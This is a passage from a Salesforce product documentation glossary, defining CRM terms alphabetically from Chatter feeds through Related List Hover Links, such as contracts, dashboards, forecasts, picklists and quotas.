A list of recent activities in Salesforce. Chatter feeds display:
• On the Chatter or Home tab, where you can see your posts, posts from people you follow, and updates to records

you follow, and posts to groups you're a member of
• On profiles, where you can see posts made by the person whose profile you're viewing
• On records, where you can see updates to the record you're viewing
• On Chatter groups, where you can see posts to the group you're viewing

Chatter Group
Chatter groups let you share information with specific people. For example, if you're working on a project and want to
share information only with your team members, you can create a Chatter group for your team. Chatter groups include
a list of members, a Chatter feed, and a photo. You can create the following types of Chatter groups:
• Public: Only group members can post, but anyone can see the posts and join the public group.
• Private: Only group members can post and see the posts. The group's owner or managers must add members.

Cloud Flow Designer
Cloud-based application that lets administrators create a flow for use in Salesforce.

Combination Chart
A combination chart plots multiple sets of data on a single chart. Each set of data is based on a different field, so values
are easy to compare. You can also combine certain chart types to present data in different ways on a single chart.

Connection (for Salesforce to Salesforce)
A business partner that you invite to share data using Salesforce to Salesforce.

Community
Communities are customizable public or private spaces for employees, end-customers, and partners to collaborate on
best practices and business processes.

Community Application
The Community application includes the ideas and answers features. The Community app is available in the Force.com
app menu.

Community Expert
A community expert is a member of the community who speaks credibly and authoritatively on behalf of your organization.
When a community expert posts a comment or idea, a unique icon ( ) displays next to his or her name so other
community members can easily identify credible information within the community. The Salesforce administrator can
designate as many community experts as necessary.

Commit Amount
Amount entered in a forecast that an individual salesperson is reasonably confident of closing in a particular month or
quarter. For managers, this should equal the amount that they and their team can confidently close.
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Competitor
Related list that displays competitor names, strengths, and weaknesses entered for a specific opportunity.

Computer-Telephony Integration (CTI)
The linkage between a telephone system and a computer that facilitates incoming- and outgoing-call handling and
control.

Connect for Lotus Notes
Force.com Connect for Lotus Notes is an add-in for IBM® Lotus Notes® that adds new commands to the Lotus Notes
user interface that let you interact with Salesforce. Connect for Lotus Notes is not available in organizations activated
on or after October 1, 2011.

Connect for Office
Product that allows you to integrate Salesforce with Microsoft® Word and Excel.

Connect for Outlook
Force.com Connect for Microsoft Outlook is an add-in for Microsoft Outlook that allows you to interact with Salesforce
conveniently from Outlook. Connect for Outlook adds buttons and options to your Outlook user interface.

Connect Offline
Product that allows salespeople to use Salesforce to update their data remotely, anywhere, anytime—totally unplugged.

Console Tab
A tab that combines related records into one screen with different frames so that users can view and edit information all
in one place.

Contact
Contacts are the individuals associated with your accounts.

Contact Manager Edition
A Salesforce edition designed for small businesses that provides access to key contact management features.

Contact Role
The role that a contact plays in a specific account, contract, or opportunity, such as “Decision Maker” or “Evaluator.”
You can mark one contact as the “primary” contact for the account, contract, or opportunity. A contact may have different
roles in various accounts, contract, or opportunities.

Content Delivery
A file that has been converted into an optimized online format for distributions to leads, contacts, and colleagues.

Content Pack
A collection of related documents or files that are stored as a group in Salesforce CRM Content.

Contract
A contract is an agreement defining the terms of business between parties.

Contract Line Item
Contract line items are specific products covered by a service contract. They only display to users on the Contract Line
Items related list on service contracts, not contracts.

Controlling Field
Any standard or custom picklist or checkbox field whose values control the available values in one or more corresponding
dependent fields.
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Convert
Button or link that allows you to change a qualified lead into an account, contact, and, optionally, an opportunity.
Information from the lead fields is transferred into the appropriate account, contact, and opportunity fields.

CTI Adapter
A lightweight software program that controls the appearance and behavior of a Salesforce SoftPhone. The adapter acts
as an intermediary between a third-party computer telephony integration (CTI) system, Salesforce, and a Salesforce
CRM Call Center user. It must be installed on any machine that needs access to Salesforce CRM Call Center functionality.

Custom Console Component
A Visualforce page added to a Service Cloud console by an administrator to customize, integrate, or extend the capabilities
of the console.

Custom Field
A field that can be added in addition to the standard fields to customize Salesforce for your organization’s needs.

Custom Help
Custom text administrators create to provide users with on-screen information specific to a standard field, custom field,
or custom object.

Custom Links
Custom links are URLs defined by administrators to integrate your Salesforce data with external websites and back-office
systems. Formerly known as Web links.

Custom Object
Custom records that allow you to store information unique to your organization.

Custom Report Type
See Report Type.

Custom S-Control

Note:  S-controls have been superseded by Visualforce pages. After March 2010 organizations that have never
created s-controls, as well as new organizations, won't be allowed to create them. Existing s-controls will remain
unaffected, and can still be edited.

Custom Web content for use in custom links. Custom s-controls can contain any type of content that you can display
in a browser, for example a Java applet, an Active-X control, an Excel file, or a custom HTML Web form.

Customizable Forecasting
A revised forecasting module that allows organizations to customize forecasts for their organization’s business process.

Custom View
A display feature that lets you see a specific set of records for a particular object.

D
Dashboard

A dashboard shows data from source reports as visual components, which can be charts, gauges, tables, metrics, or
Visualforce pages. The components provide a snapshot of key metrics and performance indicators for your organization.
Each dashboard can have up to 20 components.
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Dashboard Builder
Dashboard builder is a drag-and-drop interface for creating and modifying dashboards.

Data Category for Answers
On the Answers tab, data categories allow users to classify questions in an answers zone. For example, if you have a zone
for hardware products, your data categories may include laptops, desktops, and printers. Zone members can quickly
browse within a specific category to find answers to their questions. Administrators can use data categories to control
access to questions.

Data Category for Articles
In Salesforce Knowledge, data categories are a set of criteria organized hierarchically into category groups. Articles in the
knowledge base can be classified according to multiple categories that make it easy for users to find the articles they need.
For example, to classify articles by sales regions and business units, create two category groups, Sales Regions and Business
Units. The Sales Regions category group could consist of a geographical hierarchy, such as All Sales Regions as the top
level, North America, Europe, and Asia at the second level, and so on up to five levels. Authors assign categories to
articles. Administrators can use data categories to control access to articles.

Database.com
Database.com is an enterprise cloud database from salesforce.com.

Dated Exchange Rates
Dated exchange rates allow you to map a currency conversion rate to a specific date range. For example, the exchange
rate on January 1 was 1 USD to 1.39 AUD, but on February 1, it changed to 1 USD to 1.42 AUD. Your opportunities
that closed between January 1 and February 1 use the first exchange rate (1 = 1.39), while opportunities that closed after
February 1 used the second exchange rate (1 = 1.42).

Demote
If you dislike an idea, you can click demote to subtract 10 points from its overall score and decrease the idea's overall
popularity ranking. You cannot demote the same idea more than once, and after you demote an idea you cannot promote
it. An idea can have negative overall points if more users demote the idea than promote it.

Dependent Field
Any custom picklist or multi-select picklist field that displays available values based on the value selected in its
corresponding controlling field.

Desktop Flow Designer
Desktop application that allows administrators to create a flow for use in Salesforce.

Detail
A page that displays information about a single object record. The detail page of a record allows you to view the
information, whereas the edit page allows you to modify it.

A term used in reports to distinguish between summary information and inclusion of all column data for all information
in a report. You can toggle the Show Details/Hide Details button to view and hide report detail information.

Detail View
The Console tab's center frame, which is the detail page view of any record selected from any of the console’s other
frames. The detail view displays the same page layouts defined for the object’s detail pages. When a record is displayed
in the detail view, it is highlighted in the list view.

Developer Edition
A free, fully-functional Salesforce organization designed for developers to extend, integrate, and develop with the
Force.com platform. Developer Edition accounts are available on developer.force.com.
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Document Library
A place to store documents without attaching them to accounts, contacts, opportunities, or other records.

Draft Article
Draft articles are in-progress articles that have not been published, which means they are not visible on the Articles tab
(in any channel) or in a public knowledge base. Article managers can access draft articles on the Article Management
tab by clicking the Articles tab in the View area and choosing Draft Articles. You can filter draft articles by those
assigned to you or those assign to anyone (all draft articles for your organization). Draft articles can be assigned to any
user involved in the editorial work.

Draft Translation
Draft translations are in-progress translations of articles into multiple languages. They have not been published, which
means they are not visible on the Articles tab (in any channel) or in a public knowledge base. Article managers can access
draft translations on the Articles Management tab by clicking the Translations tab in the View area and choosing Draft
Translations. You can filter draft translations by those assigned to you, those assigned to a translation queue, or those
assigned to anyone (all draft translations in your organization). Translations can be assigned to any user who can publish
Salesforce Knowledge articles.

Dynamic Dashboard
A dynamic dashboard runs using the security settings of the user viewing the dashboard. Each user sees the dashboard
according to his or her own access level. This approach helps administrators share one common set of dashboard
components to users with different levels of access.

E
Email Alert

Email alerts are workflow and approval actions that are generated using an email template by a workflow rule or approval
process and sent to designated recipients, either Salesforce users or others.

Email Template
A form email that communicates a standard message, such as a welcome letter to new employees or an acknowledgement
that a customer service request has been received. Email templates can be personalized with merge fields, and can be
written in text, HTML, or custom format.

Enterprise Edition
A Salesforce edition designed for larger, more complex businesses.

Entitlement
Entitlements help you determine if your customers are eligible for customer support so you can create cases for them. A
customer may be eligible for support based on a particular asset, account, or service contract.

Entitlement Contact
Entitlement contacts are contacts specified to receive customer support—for example, a named caller. They're listed on
an entitlement's Contacts related list or the contact's Entitlements related list. Entitlement contacts don't have page
layouts, search layouts, buttons, links, or record types.

Entitlement Process
Entitlement processes are timelines that include all of the steps (milestones) that your support team must complete to
resolve cases. Each process includes the logic necessary to determine how to enforce the correct service level for your
customers.
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Entitlement Template
Entitlement templates are predefined terms of customer support that you can quickly add to products. For example, you
can create entitlement templates for Web or phone support so that users can easily add entitlements to products offered
to customers.

External User
External users are users with Community, Customer Portal, or partner portal licenses.

F
Feed Attachment, Chatter

A feed attachment is a file or link that is attached to a post in a Chatter feed.

Feed Filter, Chatter
Feed filters display a subset of posts in your Chatter feed on the Chatter tab.

Feed Tracking, Chatter
Administrator settings that determine which records can be followed and which fields can be tracked in Chatter feeds.
Enabling an object for feed tracking allows people to follow records of that object type. Enabling fields for feed tracking
allows users to see updates on the Chatter feed when those fields are changed on records they follow.

Field-Level Help
Custom help text that you can provide for any standard or custom field. It displays when users hover a mouse over the
help icon adjacent to that field.

Field-Level Security
Settings that determine whether fields are hidden, visible, read only, or editable for users. Available in Enterprise,
Unlimited, and Developer Editions only.

Field Sets
A field set is a grouping of fields. For example, you could have a field set that contains fields describing a user's first
name, middle name, last name, and business title. Field sets can be referenced on Visualforce pages dynamically. If the
page is added to a managed package, administrators can add, remove, or reorder fields in a field set to modify the fields
presented on the Visualforce page without modifying any code.

Field Update
Field updates are workflow and approval actions that specify the field you want updated and the new value for it.
Depending on the type of field, you can choose to apply a specific value, make the value blank, or calculate a value based
on a formula you create.

File Collaborator
Users with the “collaborator” permission can view, download, share, change permission, edit the file, and upload new
versions of files in Chatter.

File Owner

You are the owner of a file when you upload the file in Chatter, attach the file to a Chatter feed, or upload the file in
Salesforce CRM Content.

As the owner of the file you can view, edit, download, share, upload a new version, and delete the file, as well as make
the file private and change the permission on the file.
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File, Private

A private file in Chatter is indicated by the private icon ( ) and is only available to the file owner and isn't shared with
anyone. A private file is created when you upload a file on the Files tab or contribute a file to a Salesforce CRM Content
personal library. You own files you upload or contribute.

File, Privately Shared

A privately shared file in Chatter is indicated by the privately shared icon ( ) and is only available to the file owner
and the specific people or groups it has been shared with.

File, Your Company

The your company icon ( ) indicates a file that is shared with all Chatter users in your company. All Chatter users in
your company can find and view this file.

File Viewer
Users with the “viewer” permission can view, download, and share files in Chatter.

Files Tab
A tab that lists a user's Chatter and Salesforce CRM Content files.

Filter Condition/Criteria
Condition on particular fields that qualifies items to be included in a list view or report, such as “State equals California.”

Fiscal Year
A period that an organization uses for financial planning purposes, such as forecasting, whose length is usually similar
to the length of a calendar year. Fiscal years usually contain smaller fiscal periods, such as quarters or trimesters.

Flag
An icon that users can click on a question or reply to report it as spam, hateful, or inappropriate.

Folder
A folder is a place where you can store reports, dashboards, documents, or email templates. Folders can be public, hidden,
or shared, and can be set to read-only or read/write. You control who has access to its contents based on roles, permissions,
public groups, and license types. You can make a folder available to your entire organization, or make it private so that
only the owner has access.

Follow
A subscription to a user or record that lets you see related updates in your Chatter feed. Follow a user to see the users’s
posts. Follow a record to see posts, comments, and field changes.

Follow, Chatter Answers
A subscription to a question that lets you receive emails when someone answers or comments on a specific question.

Force.com App Menu
A menu that enables users to switch between customizable applications (or “apps”) with a single click. The Force.com
app menu displays at the top of every page in the user interface.

Force.com Enterprise App
A custom app with up to eight (8) custom objects and eight (8) custom tabs, read-write access to accounts and contacts,
and access to Sharing, Bulk API, or Streaming API.
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Force.com Light App
A custom app with up to eight (8) custom objects and eight (8) custom tabs, read-only access to accounts and contacts,
and no access to Sharing, Bulk API, or Streaming API.

Forecast Amount
Applies to Collaborative Forecasts. The revenue forecast from the forecast manager’s perspective and the sum of the
owner’s and subordinates’ opportunities, including all forecast adjustments.

Forecast Category
Determines the category to which an opportunity is attributed in a forecast. The default category setting for an opportunity
is tied to its stage, as set in the Stage picklist. To update the Forecast Category for a particular opportunity, you
must edit that opportunity’s forecast.

Forecast Quantity
Applies to Collaborative Forecasts. The quantity forecast from the forecast manager’s perspective and the sum of the
owner’s and subordinates’ opportunities, including all forecast adjustments.

Forecast User
A user who can see and work with forecasts below them in either the forecast hierarchy or territory hierarchy.

Forecasts
Projections of sales based on the organization's fiscal year.

Formula Field
A type of custom field. Formula fields automatically calculate their values based on the values of merge fields, expressions,
or other values.

G
Global Search

Search more records and fields in Salesforce from the header search box. Global search keeps track of which objects you
use and how often you use them, and arranges the search results accordingly. Search results for the objects you use most
frequently appear at the top of the list.

Global Variable
A special merge field that you can use to reference data in your organization.

A method access modifier for any method that needs to be referenced outside of the application, either in the SOAP
API or by other Apex code.

Group
A groups is a set of users. Groups can contain individual users, other groups, or the users in a role. Groups can be used
to help define sharing access to data or to specify which data to synchronize when using Connect for Outlook or Connect
for Lotus Notes.

Users can define their own personal groups. Administrators can create public groups for use by everyone in the organization.

Group Edition
A product designed for small businesses and workgroups with a limited number of users.

Group Task
A task that was assigned to multiple users when it was created. Note that group tasks are independent records that are
not linked; they can be edited, transferred, or deleted individually.
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Guest User
Guest users can access public Site.com and Force.com sites, and public pages in Communities, via the Guest User license
associated with each site or community.Guest users’ access to objects and data is controlled by public access settings on
the Guest User profile.

H
Half-life

The half-life setting determines how quickly old ideas drop in ranking on the Popular Ideas subtab, to make room for
ideas with more recent votes. A shorter half-life moves older ideas down the page faster than a longer half-life. This
setting affects all zones in your organization.

Highlights Panel
A customizable table of up to four columns and two rows that appears at the top of every primary tab in a Service Cloud
console. It lets you view key information about records at a glance.

High-Volume Portal Users
Limited-access users intended for organizations with many thousands to millions of portal users. Unlike other users,
high-volume portal users don't have roles, which eliminates performance issues associated with role hierarchy calculations.
High-volume portal users include both the High Volume Customer Portal User and Authenticated Website User license
types.

Home Tab
Starting page from which users can choose sidebar shortcuts and options, view current tasks and activities, or select
another tab.

Hover Detail
Hover details display an interactive overlay containing detailed information about a record when users hover the mouse
over a link to that record in the Recent Items list on the sidebar or in a lookup field on a record detail page. Users can
quickly view information about a record before clicking View for the record's detail page or Edit for the edit page. The
fields displayed in the hover details are determined by the record's mini page layout. The fields that display in document
hover details are not customizable.

I
Idea

Ideas are suggestions posted by the members of an ideas community and are organized by zones. For example, if the
focus of a particular zone is “Ideas for car features,” an appropriate idea for that zone might have the title “Insulated cup
holders that keep your beverage hot or cold.” Or, if the focus of a particular zone is “Ideas for our company's employee
benefits,” an appropriate idea for that zone might have the title “On-site day care.”

Immediate Action
A workflow action that executes instantly when the conditions of a workflow rule are met.

Influence, Chatter
An indicator of a person’s influence in Chatter. The number of posts and comments the person makes, and the number
of comments and likes the person receives determine the level of influence.
• Top Influencers lead collaboration efforts by regularly sharing essential content.
• Active Influencers encourage others to get involved and share knowledge.
• Observers are quiet participants or just getting started in Chatter.
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Interaction Log
An area in a Service Cloud console where you can jot notes about the main record you're working on without clicking
a button, viewing a new tab, or scrolling to the Notes & Attachments related list. Interaction logs are archived on the
Activity History related list for easy review and retrieval. Administrators can customize interaction logs to include task
fields.

J
Junction Object

A custom object with two master-detail relationships. Using a custom junction object, you can model a “many-to-many”
relationship between two objects. For example, you may have a custom object called “Bug” that relates to the standard
case object such that a bug could be related to multiple cases and a case could also be related to multiple bugs.

K
Knowledge Agent

Salesforce uses the term knowledge agent to represent a specific type of user. Knowledge agents are article consumers in
the internal Salesforce Knowledge app. These users can access the Articles tab to search for and view articles, but they
cannot create, edit, or manage articles.

Knowledge Sidebar
A sidebar in a Service Cloud console that displays titles of Salesforce Knowledge articles that may solve the case you're
working on. It automatically searches and returns articles from your knowledge base that match any of the words you
type in the Subject of a case. The sidebar only displays for Salesforce Knowledge users after administrators set it up.

L
Layout

See Page Layout.

Lead
A lead is a sales prospect who has expressed interest in your product or company.

Library
A file repository in Salesforce CRM Content.

Library Permission
A group of privileges that determines user access within a Salesforce CRM Content library.

Like
To show support for a post or comment in a Chatter feed. When you like a post or comment, you receive email
notifications for subsequent comments.

Like, Chatter Answers
To show support or indicate quality or usefulness for a question, answer, or knowledge article.

List Price
The price of a product in a custom price book.

List View
A list display of items (for example, accounts or contacts) based on specific criteria. Salesforce provides some predefined
views.
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In the Console tab, the list view is the top frame that displays a list view of records based on specific criteria. The list
views you can select to display in the console are the same list views defined on the tabs of other objects. You cannot
create a list view within the console.

Live Agent
Live Agent lets service organizations connect with customers or website visitors in real time through a Web-based,
text-only live chat.

Live Agent Console
The Live Agent console is a dedicated console used by customer service agents to manage Live Agent chats. Agents can
answer chat requests, conduct live chats, and interact with Salesforce records and Salesforce Knowledge articles.

Local Name
The value stored for the field in the user’s or account’s language. The local name for a field is associated with the standard
name for that field.

Lookup Dialog
Popup dialog available for some fields that allows you to search for a new item, such as a contact, account, or user.

Lookup Field
A type of field that contains a linkable value to another record. You can display lookup fields on page layouts where the
object has a lookup or master-detail relationship with another object. For example, cases have a lookup relationship with
assets that allows users to select an asset using a lookup dialog from the case edit page and click the name of the asset
from the case detail page.

Lookup Relationship
A relationship between two records so you can associate records with each other. For example, cases have a lookup
relationship with assets that lets you associate a particular asset with a case. On one side of the relationship, a lookup
field allows users to click a lookup icon and select another record from a popup window. On the associated record, you
can then display a related list to show all of the records that have been linked to it. If a lookup field references a record
that has been deleted, by default Salesforce clears the lookup field. Alternatively, you can prevent records from being
deleted if they’re in a lookup relationship.

M
Marketing User

One or more individuals in your organization who can manage campaigns. Administrators can designate someone as a
Marketing User by selecting the Marketing User checkbox in the user’s personal information.

Only marketing users can create, edit, and delete campaigns or configure advanced campaign setup.

To use the campaign import wizards, marketing users must also have the Marketing User profile or the “Import Leads”
permission.

Master-Detail Relationship
A relationship between two different types of records that associates the records with each other. For example, accounts
have a master-detail relationship with opportunities. This type of relationship affects record deletion, security, and makes
the lookup relationship field required on the page layout.

Master Picklist
A complete list of picklist values available for a record type or business process.
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Matrix Report
Matrix reports are similar to summary reports but allow you to group and summarize data by both rows and columns.
They can be used as the source report for dashboard components. Use this type for comparing related totals, especially
if you have large amounts of data to summarize and you need to compare values in several different fields, or you want
to look at data by date and by product, person, or geography.

Member Status
The status of a lead or contact in relation to a campaign. For example, a lead or contact could have a member status of
“Planned,” “Sent,” or “Responded” at different stages of an email campaign.

Mention
A mention is the @ symbol followed by a person’s name, for example, @Bob Smith. You can mention people in Chatter
posts and comments. When you mention someone, the mention links to their profile, the post or comment displays in
their feed, and they are emailed a notification.

Message, Chatter
A Chatter message is a private communication with other Chatter users. Use messages to send your manager a question
privately, or to communicate with a few select people when a discussion isn't relevant to everyone you work with. Messages
don't appear in your feed, your profile, or any other part of Chatter that's publicly visible.

Merge Field
A merge field is a field you can put in an email template, mail merge template, custom link, or formula to incorporate
values from a record. For example, Dear {!Contact.FirstName}, uses a contact merge field to obtain the value of
a contact record's First Name field to address an email recipient by his or her first name.

Milestone
Milestones are required steps in your support process. They're metrics that represent service levels to provide to each of
your customers. Examples of milestones include first response and resolution times on cases.

Milestone Actions
Milestone actions are time-dependent workflow actions that occur at every step (milestone) in an entitlement process.
Examples of milestone actions include sending email alerts to specified users an hour before a first response is near
violation or automatically updating certain fields on a case one minute after a first response successfully completes.

Mini Page Layout
A subset of the items in a record's existing page layout that administrators choose to display in the Console tab's Mini
View and in Hover Details. Mini page layouts inherit record type and profile associations, related lists, fields, and field
access settings from the page layout.

Mini View
The Console tab's right frame which displays the records associated with the record displayed in the detail view. The
fields displayed in the mini view are defined in the mini page layouts by an administrator. The mini view does not display
if the record in the detail view does not have any records associated with it.

Multi-Person Event
A planned event to which multiple users are invited, also referred to as a meeting. You can create multi-person events
by inviting other users to any calendar event you create.

Multi-Select Picklist
See Picklist (Multi-Select).
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My Settings
When the improved Setup user interface is enabled in an organization, personal settings are available from a separate
My Settings menu.

N
Navigation Tab

A tab with a drop-down button in a Service Cloud console that lets you select and view object home pages.

Nickname
A nickname is the name used to identify this user in a community. Up to 40 alphanumeric characters are allowed.
Standard users can edit this field.

O
Object

An object allows you to store information in your Salesforce organization. The object is the overall definition of the type
of information you are storing. For example, the case object allow you to store information regarding customer inquiries.
For each object, your organization will have multiple records that store the information about specific instances of that
type of data. For example, you might have a case record to store the information about Joe Smith's training inquiry and
another case record to store the information about Mary Johnson's configuration issue.

Object-Level Help
Custom help text that you can provide for any custom object. It displays on custom object record home (overview), detail,
and edit pages, as well as list views and related lists.

Open CTI
An application programming interface that lets developers build CTI (computer-telephony integration) systems that
integrate with Salesforce without the use of CTI adpaters or client applications.

Operator
An operator is an item used to narrow or broaden a search. In most Salesforce searches, AND, OR, AND NOT,
parentheses ( ), and quotation marks " " can be used as operators.

Opportunities
Opportunities track your sales and pending deals.

Opportunity Team
An opportunity team is a set of users that normally work together on sales opportunities. A typical opportunity team
might include the account manager, the sales representative, and a pre-sales consultant. You can specify the opportunity
team for each opportunity that you own.

Organic Search Leads
Organic search lead is a specific lead source indicating that the lead was generated when a user, who arrived at your
website by way of an unpaid (organic) listing on a major search engine, filled out the Web-to-Lead form containing the
Salesforce tracking code. The lead source details contain the search engine and the search phrase for each organic lead.

Organization
A deployment of Salesforce with a defined set of licensed users. An organization is the virtual space provided to an
individual customer of salesforce.com. Your organization includes all of your data and applications, and is separate from
all other organizations.
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Organization-Wide Address
An organization-wide address allows you to associate a single email address as an alias for all users within a user profile.

Outbound Message
An outbound message is a workflow, approval, or milestone action that sends the information you specify to an endpoint
you designate, such as an external service. An outbound message sends the data in the specified fields in the form of a
SOAP message to the endpoint. Outbound messaging is configured in the Salesforce setup menu. Then you must
configure the external endpoint. You can create a listener for the messages using the SOAP API.

Owner Only Amount
Applies to Collaborative Forecasts. The sum of all of a person’s revenue opportunities, without adjustments.

Owner Only Quantity
Applies to Collaborative Forecasts. The sum of all of a person’s quantity opportunities, without adjustments.

Salesforce for Outlook Configuration
A Salesforce for Outlook configuration is a set of parameters that determine the data that Salesforce for Outlook users
can sync between Microsoft® Outlook® and Salesforce. You can create multiple configurations to simultaneously suit
the needs of different types of users. For example, an opportunity team might want to sync everything, while a manager
might only want to sync events. Users may be able to edit some of their own settings.

Owner
Individual user to which a record (for example, a contact or case) is assigned.

P
PaaS

See Platform as a Service.

Package
A group of Force.com components and applications that are made available to other organizations through the
AppExchange. You use packages to bundle an app along with any related components so that you can upload them to
AppExchange together.

Package Installation
Installation incorporates the contents of a package into your Salesforce organization. A package on the AppExchange
can include an app, a component, or a combination of the two. After you install a package, you may need to deploy
components in the package to make it generally available to the users in your organization.

Page Layout
Page layout is the organization of fields, custom links, and related lists on a record detail or edit page. Use page layouts
primarily for organizing pages for your users. In Enterprise, Unlimited, and Developer Editions, use field-level security
to restrict users’ access to specific fields.

Parent Account
An organization or company that an account is affiliated. By specifying a parent for an account, you can get a global
view of all parent/subsidiary relationships using the View Hierarchy link.

Partner
Partners are the companies with which you collaborate to close your sales deals. For each opportunity or account you
create, the Partners related list allows you to store information about your partners and the roles they play in the opportunity

3962

Glossary



or account. A partner must be an existing account within Salesforce. Selecting a partner role automatically creates a
reverse partner relationship with the associated account so that both accounts list the other account as a partner.

Partner Accounts
Partner accounts are Salesforce accounts that a channel manager uses to manage partner organizations, partner users,
and activities when using the partner portal.

Partner Role
Selection for an account on the Partners related list of an individual account or opportunity that specifies the role that
the account has in related sales deals.

Partner User
Partner users are Salesforce users with limited capabilities. They are external to your organization but sell your products
or services through indirect sales channels. They are associated with a particular partner account, have limited access to
your organization's data, and log in via a partner portal.

Partner Portal
Partner portal allows partner users to log in to Salesforce through a Web portal rather than through salesforce.com.

Percent (%) Quota
For forecasting versions where quotas are available, this is the calculated value in forecasts that indicates what percentage
of the quota a salesperson is confident of closing. This amount is the Commit Amount divided by the Quota.

Permission
A permission is a setting that allows a user to perform certain functions in Salesforce. Permissions can be enabled in
permission sets and profiles. Examples of permissions include the “Edit” permission on a custom object and the “Modify
All Data” permission.

Permission Set
A collection of permissions and settings that gives users access to specific tools and functions.

Person Account
A person account is an individual consumer with whom you do business, such as a financial services client, an online
shopper, or a vacation traveler. Person accounts are applicable to organizations that operate on a business-to-consumer
model as opposed to a business-to-business model.

Personal Edition
Product designed for individual sales representatives and single users.

Personal Settings
Settings and customization options to help users personalize their Salesforce experience. All Salesforce users can edit
their own personal settings. Depending on an organization’s user interface settings, personal settings are either in the
Personal Setup area of the Setup menu, or available from a separate My Settings menu.

Phrase Search
A type of full-text search that matches only items that contain a specified phrase, such as “customer relationship
management.”

Picklist
Selection list of options available for specific fields in a Salesforce object, for example, the Industry field for accounts.
Users can choose a single value from a list of options rather than make an entry directly in the field. See also Master
Picklist.
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Picklist (Multi-Select)
Selection list of options available for specific fields in a Salesforce object. Multi-select picklists allow users to choose one
or more values. Users can choose a value by double clicking on it, or choose additional values from a scrolling list by
holding down the CTRL key while clicking a value and using the arrow icon to move them to the selected box.

Picklist Values
Selections displayed in drop-down lists for particular fields. Some values come predefined, and other values can be
changed or defined by an administrator.

Pinned Lists
Lists that display at the top or on the left side of a Service Cloud console; they're always visible and let you see the list
you're working from and a record's details at the same time. Pinned lists must be turned on by an administrator.

Pipeline
Calculated amount of open opportunities that have a close date within the quarter. Displays on forecast detail and edit
pages. For managers, this amount includes open opportunities for them and their entire team.

Platform as a Service (PaaS)
An environment where developers use programming tools offered by a service provider to create applications and deploy
them in a cloud. The application is hosted as a service and provided to customers via the Internet. The PaaS vendor
provides an API for creating and extending specialized applications. The PaaS vendor also takes responsibility for the
daily maintenance, operation, and support of the deployed application and each customer's data. The service alleviates
the need for programmers to install, configure, and maintain the applications on their own hardware, software, and
related IT resources. Services can be delivered using the PaaS environment to any market segment.

Popular Ideas
On the Popular Ideas subtab, ideas are sorted by an internal calculation that reflects the age of an idea's positive votes.
Regardless of an idea's static total number of points, ideas with newer positive votes display higher on the page than
ideas with older positive votes. This allows you to browse ideas that have most recently gained popularity, with less
precedence given to long-established ideas that were positively voted on in the past.

Popular Questions
Each question's popularity is based on the number of users who Like it within a certain amount of time.

Post
A top-level comment in a Chatter feed.

Post Sharing
Lets you copy a public Chatter post and publish it to your profile or a group you’re a member of. You can also share the
post with other Chatter users by sending a link to the post in an email or instant message.

Price Book
A price book is a list of products that your organization sells. Available in Professional, Enterprise, Unlimited, and
Developer Editions only.

Primary Contact
Field in company information that lists the primary contact for your organization.

Also indicates the primary contact associated with an account, contract, or opportunity. Specified as a checkbox in the
Contact Roles related list of an account, contract, or opportunity.
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Primary Partner
Partner account designated as playing a key role in closing an opportunity. Specified as a checkbox in the Partners related
list of an opportunity.

Primary Tab
A tab in a Service Cloud console that displays the main item to work on, such as an account.

Process Visualizer
A tool that displays a graphical version of an approval process. The view-only diagram is presented as a flowchart. The
diagram and an informational sidebar panel can help you visualize and understand the defined steps, rule criteria, and
actions that comprise your approval process.

Professional Edition
A Salesforce edition designed for businesses who need full-featured CRM functionality.

Product Family
A picklist field on products that you can customize to categorize types of products.

Profile
Defines a user’s permission to perform different functions within Salesforce. For example, the Solution Manager profile
gives a user access to create, edit, and delete solutions.

Profile, Chatter
A personal page for each Salesforce user that includes contact information, following and followers lists, a Chatter feed,
and a photo.

Promote
If you agree with or like an idea, click promote to add 10 points to the idea. You cannot promote the same idea more
than once and you cannot promote an idea that you have already demoted. Salesforce automatically adds your promote
vote to any idea you post.

To migrate changes from one organization to another. See also Deploy and Migration.

Public Calendar
A calendar in which a group of people can track events of interest to all of them (such as marketing events, product
releases, or training classes) or schedule a common activity (such as a team vacation calendar). For example, your marketing
team can set up an events calendar to show upcoming marketing events to the entire sales and marketing organization.

Push Notifications, Moble
Push notifications are alerts that apps render on mobile device home screens when users are not using the app. These
alerts can consist of text, icons, and sounds, depending on the device type.

Push Notifications, Service Cloud Console
Visual indicators in a Service Cloud console that show when a record or field has changed during a user’s session.

Push Upgrade
A method of delivering updates that sends upgrades of an installed managed package to all organizations that have
installed the package.

3965

Glossary



Q
Quantity Schedule

A quantity schedule outlines the dates, number of units (i.e., quantity), and number of installments for billing or shipping
a product. Your organization can decide exactly how to use schedules. Available in Enterprise, Unlimited, and Developer
Editions only.

Quantity Forecasting
Forecasting based on the projected number of units sold.

Quantity Without Adjustments
Applies to Collaborative Forecasts. The sum of a person’s owned quantity opportunities and also his or her subordinates’
opportunities, without adjustments. Subordinates include everyone reporting up to a person in the forecast hierarchy.

Quantity Without Manager Adjustment
Applies to Collaborative Forecasts. The forecast number as seen by the forecast owner. This is the sum of the owner’s
quantity opportunities and his or her subordinates’ opportunities, including adjustments made on the subordinates’
forecasts.  It doesn’t include adjustments made by forecast managers above the owner in the forecast hierarchy.

Question
An issue posted to an answers community. When a community member asks a question, other community members
post replies to help resolve the question.

Question, Private
An issue posted to an answers community, but marked Private so that only support agents can view and respond to it.

Queue
A holding area for items before they are processed. Salesforce uses queues in a number of different features and
technologies.

Quota
The sales goal assigned to a user on a monthly and quarterly basis. (If you use Collaborative Forecasts, it’s the sales goal
assigned to a user on a monthly basis.) A manager’s quota should equal the amount she and her team are expected to
generate together.

Quote
A record showing proposed prices for products and services. Quotes can be created from opportunities and emailed as
PDFs to customers.

R
Recent Activity

Your Recent Activity page contains a summary of all the recent activity that relates to your participation within a zone.
For example, this page lists all the ideas and comments you have posted to a zone as well as the ideas you have voted on.
You can view your Recent Activity page by clicking your nickname located on the right side of the Ideas tab.

Recent Items
List of links in the sidebar for most recently accessed records. Note that not all types of records are listed in the recent
items.

Record
A single instance of a Salesforce object. For example, “John Jones” might be the name of a contact record.
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Record Type
A record type is a field available for certain records that can include some or all of the standard and custom picklist values
for that record. You can associate record types with profiles to make only the included picklist values available to users
with that profile.

Record Update
A post in a Chatter feed that is the result of a field change on a record that is being followed.

Related List
A section of a record or other detail page that lists items related to that record. For example, the Stage History related
list of an opportunity or the Open Activities related list of a case.

Related List Hover Links
A type of link that allows you to quickly view information on a detail page about related lists, by hovering your mouse
over the link. Your administrator must enable the display of hover links. The displayed text contains the corresponding
related list and its number of records. You can also click this type of link to jump to the content of the related list without
having to scroll down the page.

